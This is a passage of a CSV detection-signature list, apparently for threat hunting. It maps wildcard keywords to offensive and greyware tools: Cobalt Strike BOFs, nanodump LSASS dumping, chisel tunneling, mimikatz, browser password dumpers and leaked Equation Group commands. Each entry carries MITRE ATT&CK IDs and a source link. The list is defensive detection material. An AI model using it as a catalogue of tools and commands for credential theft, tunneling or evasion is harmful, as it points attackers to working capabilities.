+"*check_all*.pl*","offensive_tool_keyword","CheckPlease","perl script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
+"*check_all*.ps1*","offensive_tool_keyword","CheckPlease","ps1 script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
+"*check_all*.py*","offensive_tool_keyword","CheckPlease","python script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
+"*check_and_write_IAT_Hook*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z"
+"*check_cve-2020-1472.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WiIs0n/Zerologon_CVE-2020-1472","1","1","N/A","N/A","1","10","5","2020-10-05T07:47:02Z","2020-09-29T18:45:44Z"
+"*check_function ntdll.dll EtwEventWrite*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z"
+"*check_ppl_requirements*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*checkIfHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z"
+"*Check-LocalAdminHash.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*CheckPlease*","offensive_tool_keyword","CheckPlease","This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads.","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
+"*CheckPort.csproj*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*CheeseDCOM.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*CheeseExec.csproj*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*CheeseExec.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*CheesePS.csproj*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*CheesePS.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*CheeseRDP.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*CheeseSQL.exe*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*CheeseTools.sln*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*CheeseTools-master*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*chenjiandongx/sniffer*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z"
+"*Chimera-main.zip*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z"
+"*Chimera-master.zip*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*chioafkonnhbpajpengbalkececleldf*","greyware_tool_keyword","BullVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*chisel -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*chisel client -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*chisel client http*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - 
T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel server -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.exe *","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*chisel.exe client*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.exe server*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.jpillora.com*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_1*_darwin_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_1*_linux_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_linux_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_windows_amd64.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel-master.zip*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chknull.zip*","offensive_tool_keyword","ChkNull","Checks for Users with No passwords","T1078 - T1201","TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" +"*chmod +x dirty*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" +"*chmod 4777 /tmp/.scsi/dev/bin/gsh*","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - 
removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","N/A","https://linux.die.net/man/8/tmpwatch","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*chmod 666 /var/run/utmp~*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*chmod 700 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*chmod 700 nscd crond*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON","1","0","N/A","N/A","1","0","1","2017-11-12T08:13:06Z","2017-11-12T08:10:08Z" +"*chmod 755 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*choco install * common.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully 
customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*chocobo_root.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*chocolate.kirbi*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Choosing DLL to hijack.*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses 
an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*chown root %s chmod 4755 %s %s*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*chown root:root /tmp/.scsi/dev/bin/*","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","N/A","https://linux.die.net/man/8/tmpwatch","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*chrismaddalena/SharpCloud*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*chrispetrou/HRShell*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*chrome* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A" +"*chrome.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A" +"*chrome_creds.txt*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*chromecertbeggar.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*chromecertbeggar2.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ChromeDump.git*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" +"*chromedump.py*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" +"*ChromeDump-main.zip*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" +"*chromeKey.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*chromeKey.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*chromepass.exe*","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords 
stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*chromepass.zip*","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*chromiumkeydump *","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 